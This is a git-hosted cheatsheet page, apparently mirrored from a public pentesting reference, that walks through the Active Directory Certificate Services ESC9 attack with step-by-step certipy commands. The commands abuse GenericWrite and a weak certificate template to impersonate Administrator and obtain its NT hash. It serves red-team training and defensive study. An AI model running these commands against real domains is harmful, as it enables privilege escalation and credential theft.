daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adcs-esc09.md (2288B)


      1 ---
      2 title: "Active Directory - Certificate ESC9"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adcs-esc09.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc09.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Certificate ESC9
     12 
     13 ## ESC9 - No Security Extension
     14 
     15 **Requirements**
     16 
     17 * `StrongCertificateBindingEnforcement` set to `1` (default) or `0`
     18 * Certificate contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value
     19 * Certificate specifies `Any Client` authentication EKU
     20 * `GenericWrite` over any account A to compromise any account B
     21 
     22 **Scenario**
     23 
     24 <John@corp.local> has **GenericWrite** over <Jane@corp.local>, and we want to compromise <Administrator@corp.local>.
     25 <Jane@corp.local> is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value.
     26 
     27 * Obtain the hash of Jane with Shadow Credentials (using our GenericWrite)
     28 
     29     ```ps1
     30     certipy shadow auto -username John@corp.local -p Passw0rd -account Jane
     31     ```
     32 
     33 * Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part
     34 
     35     ```ps1
     36     certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator
     37     ```
     38 
     39 * Request the vulnerable certificate template ESC9 from Jane's account.
     40 
     41     ```ps1
     42     certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9
     43     # userPrincipalName in the certificate is Administrator 
     44     # the issued certificate contains no "object SID"
     45     ```
     46 
     47 * Restore userPrincipalName of Jane to <Jane@corp.local>.
     48 
     49     ```ps1
     50     certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local
     51     ```
     52 
     53 * Authenticate with the certificate and receive the NT hash of the <Administrator@corp.local> user.
     54 
     55     ```ps1
     56     certipy auth -pfx administrator.pfx -domain corp.local
     57     # Add -domain <domain> to your command line since there is no domain specified in the certificate.
     58     ```
     59 
     60 ## References
     61 
     62 * [GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025](https://mayfly277.github.io/posts/ADCS-part14/)